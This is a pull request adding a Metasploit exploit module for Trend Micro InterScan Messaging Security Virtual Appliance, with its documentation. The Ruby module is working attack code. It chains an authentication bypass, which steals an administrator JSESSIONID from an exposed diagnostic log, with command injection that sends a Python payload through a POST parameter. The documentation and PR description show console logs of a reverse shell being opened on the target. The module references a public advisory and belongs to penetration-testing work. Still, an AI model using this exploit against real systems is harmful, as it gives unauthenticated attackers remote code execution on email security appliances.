### PR TITLE
Adding Trend Micro IMSVA Widget RCE module

### DIFF
--- a/documentation/modules/exploit/linux/http/trendmicro_imsva_widget_exec.md
+++ b/documentation/modules/exploit/linux/http/trendmicro_imsva_widget_exec.md
@@ -1,0 +1,61 @@
+## Vulnerable Application
+This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.
+
+The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.
+
+**Vulnerable Application Installation Steps**
+
+IMSVA is distrubed as an ISO image by Trend Micro.
+
+Following steps are valid on the CentOS 6 x64 bit operating system.
+
+1. Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/)
+2. Find "InterScan Messaging Security (Virtual Appliance)" and click.
+3. At the time of writing this documentation, you must see "IMSVA-9.1-1600-x86-64-r2.iso" next to Download button.
+4. Click to the download button and complete installation of ISO.
+
+If you don't see a affected version of IMSVA, you can try to download IMSVA-9.1-1600 directly from following URL.
+
+[http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso](http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso)
+
+**System requirements:**
+- Virtualbox or VMware can be used. 
+- 4 GB of memory at least.
+- 120 GB of disk size at least.
+
+## Verification Steps
+
+A successful check of the exploit will look like this:
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/windows/http/trendmicro_imsva_widget_exec`
+- [ ] Set `RHOST`
+- [ ] Set `LHOST`
+- [ ] Run `check`
+- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
+- [ ] Run `exploit`
+- [ ] **Verify** that you are seeing `Awesome. JSESSIONID value` in console.
+- [ ] **Verify** that you are getting `Session with widget framework successfully initiated` session.
+
+## Scenarios
+
+```
+msf > use exploit/windows/http/trendmicro_imsva_widget_exec
+msf exploit(trendmicro_officescan_exec) > set RHOST 12.0.0.201
+RHOST => 12.0.0.184
+msf exploit(trendmicro_officescan_exec) > check
+[*] 12.0.0.184:443 The target appears to be vulnerable.
+msf exploit(trendmicro_officescan_exec) > exploit 
+
+[*] Started reverse TCP handler on 12.0.0.1:4444 
+[*] Extracting JSESSIONID from publicly accessible log file
+[+] Awesome. JSESSIONID value = 0567E974AE729E58178C9B513FEBE41E
+[*] Initiating session with widget framework
+[+] Session with widget framework successfully initiated.
+[*] Trigerring command injection vulnerability
+[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.201:44103) at 2017-10-08 18:05:11 +0300
+
+pwd
+/opt/trend/imss/UI/adminUI/ROOT/widget
+
+```

--- a/documentation/modules/exploit/linux/http/trendmicro_imsva_widget_exec.md
+++ b/documentation/modules/exploit/linux/http/trendmicro_imsva_widget_exec.md
@@ -28,7 +28,7 @@ If you don't see a affected version of IMSVA, you can try to download IMSVA-9.1-
 A successful check of the exploit will look like this:
 
 - [ ] Start `msfconsole`
-- [ ] `use exploit/windows/http/trendmicro_imsva_widget_exec`
+- [ ] `use exploit/linux/http/trendmicro_imsva_widget_exec`
 - [ ] Set `RHOST`
 - [ ] Set `LHOST`
 - [ ] Run `check`
@@ -40,12 +40,12 @@ A successful check of the exploit will look like this:
 ## Scenarios
 
 ```
-msf > use exploit/windows/http/trendmicro_imsva_widget_exec
-msf exploit(trendmicro_officescan_exec) > set RHOST 12.0.0.201
+msf > use exploit/linux/http/trendmicro_imsva_widget_exec
+msf exploit(trendmicro_imsva_widget_exec) > set RHOST 12.0.0.201
 RHOST => 12.0.0.184
-msf exploit(trendmicro_officescan_exec) > check
+msf exploit(trendmicro_imsva_widget_exec) > check
 [*] 12.0.0.184:443 The target appears to be vulnerable.
-msf exploit(trendmicro_officescan_exec) > exploit 
+msf exploit(trendmicro_imsva_widget_exec) > exploit 
 
 [*] Started reverse TCP handler on 12.0.0.1:4444 
 [*] Extracting JSESSIONID from publicly accessible log file

--- a/modules/exploits/linux/http/trendmicro_imsva_widget_exec.rb
+++ b/modules/exploits/linux/http/trendmicro_imsva_widget_exec.rb
@@ -1,0 +1,123 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution",
+      'Description'    => %q{
+        This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a
+        terminal command under the context of the web server user.
+
+        The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product
+        have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which
+        leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process
+        does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,
+        unauthenticated users can execute a terminal command under the context of the web server user.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'mr_me <mr_me@offensive-security.com>', # author of command injection
+          'Mehmet Ince <mehmet@mehmetince.net>' # author of authentication bypass & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'],
+          ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'],
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => true,
+          'RPORT' => 8445
+        },
+      'Platform'       => ['python'],
+      'Arch'           => ARCH_PYTHON,
+      'Targets'        => [[ 'Automatic', {}]],
+      'Privileged'     => false,
+      'DisclosureDate' => "Oct 7 2017",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the Trend Micro OfficeScan management interface', '/'])
+      ]
+    )
+  end
+
+  def extract_jsessionid
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'widget', 'repository', 'log', 'diagnostic.log')
+    })
+    if res && res.code == 200 && res.body.include?('JSEEEIONID')
+      res.body.scan(/JSEEEIONID:([A-F0-9]{32})/).flatten.last
+    else
+      nil
+    end
+  end
+
+  def widget_auth(jsessionid)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'widget', 'index.php'),
+      'cookie' => "CurrentLocale=en-U=en_US; JSESSIONID=#{jsessionid}"
+    })
+    if res && res.code == 200 && res.body.include?('USER_GENERATED_WIDGET_DIR')
+      res.get_cookies
+    else
+      nil
+    end
+  end
+
+  def check
+    # If we've managed to bypass authentication, that means target is most likely vulnerable.
+    jsessionid = extract_jsessionid
+    if jsessionid.nil?
+      return Exploit::CheckCode::Safe
+    end
+    auth = widget_auth(jsessionid)
+    if auth.nil?
+      Exploit::CheckCode::Safe
+    else
+      Exploit::CheckCode::Appears
+    end
+  end
+
+  def exploit
+    print_status('Extracting JSESSIONID from publicly accessible log file')
+    jsessionid = extract_jsessionid
+    if jsessionid.nil?
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+    else
+      print_good("Awesome. JSESSIONID value = #{jsessionid}")
+    end
+
+    print_status('Initiating session with widget framework')
+    cookies = widget_auth(jsessionid)
+    if cookies.nil?
+      fail_with(Failure::NoAccess, "Latest JSESSIONID is expired. Wait for sysadmin to login IMSVA")
+    else
+      print_good('Session with widget framework successfully initiated.')
+    end
+
+    print_status('Trigerring command injection vulnerability')
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'widget', 'proxy_controller.php'),
+      'cookie' => "CurrentLocale=en-US; LogonUser=root; JSESSIONID=#{jsessionid}; #{cookies}",
+      'vars_post' => {
+        'module' => 'modTMCSS',
+        'serverid' => '1',
+        'TOP' => "$(python -c \"#{payload.encoded}\")"
+      }
+    })
+  end
+end

--- a/modules/exploits/linux/http/trendmicro_imsva_widget_exec.rb
+++ b/modules/exploits/linux/http/trendmicro_imsva_widget_exec.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'The URI of the Trend Micro OfficeScan management interface', '/'])
+        OptString.new('TARGETURI', [true, 'The URI of the Trend Micro IMSVA management interface', '/'])
       ]
     )
   end

--- a/modules/exploits/linux/http/trendmicro_imsva_widget_exec.rb
+++ b/modules/exploits/linux/http/trendmicro_imsva_widget_exec.rb
@@ -37,6 +37,13 @@ class MetasploitModule < Msf::Exploit::Remote
           'SSL' => true,
           'RPORT' => 8445
         },
+      'Payload'        =>
+        {
+          'Compat'      =>
+            {
+              'ConnectionType' => '-bind'
+            },
+        },
       'Platform'       => ['python'],
       'Arch'           => ARCH_PYTHON,
       'Targets'        => [[ 'Automatic', {}]],


### PR DESCRIPTION
Fixes #8849 
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.

## Verification Steps

A successful check of the exploit will look like this:

- [x] Start `msfconsole`
- [x] `use exploit/linux/http/trendmicro_imsva_widget_exec`
- [x] Set `RHOST`
- [x] Set `LHOST`
- [x] Run `check`
- [x] **Verify** that you are seeing `The target appears to be vulnerable.`
- [x] Run `exploit`
- [x] **Verify** that you are seeing `Awesome. JSESSIONID value` in console.
- [x] **Verify** that you are getting `Session with widget framework successfully initiated` session.

## Scenarios

```
msf > use exploit/linux/http/trendmicro_imsva_widget_exec
msf exploit(trendmicro_officescan_exec) > set RHOST 12.0.0.201
RHOST => 12.0.0.184
msf exploit(trendmicro_officescan_exec) > check
[*] 12.0.0.184:443 The target appears to be vulnerable.
msf exploit(trendmicro_officescan_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Extracting JSESSIONID from publicly accessible log file
[+] Awesome. JSESSIONID value = 0567E974AE729E58178C9B513FEBE41E
[*] Initiating session with widget framework
[+] Session with widget framework successfully initiated.
[*] Trigerring command injection vulnerability
[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.201:44103) at 2017-10-08 18:05:11 +0300

pwd
/opt/trend/imss/UI/adminUI/ROOT/widget

```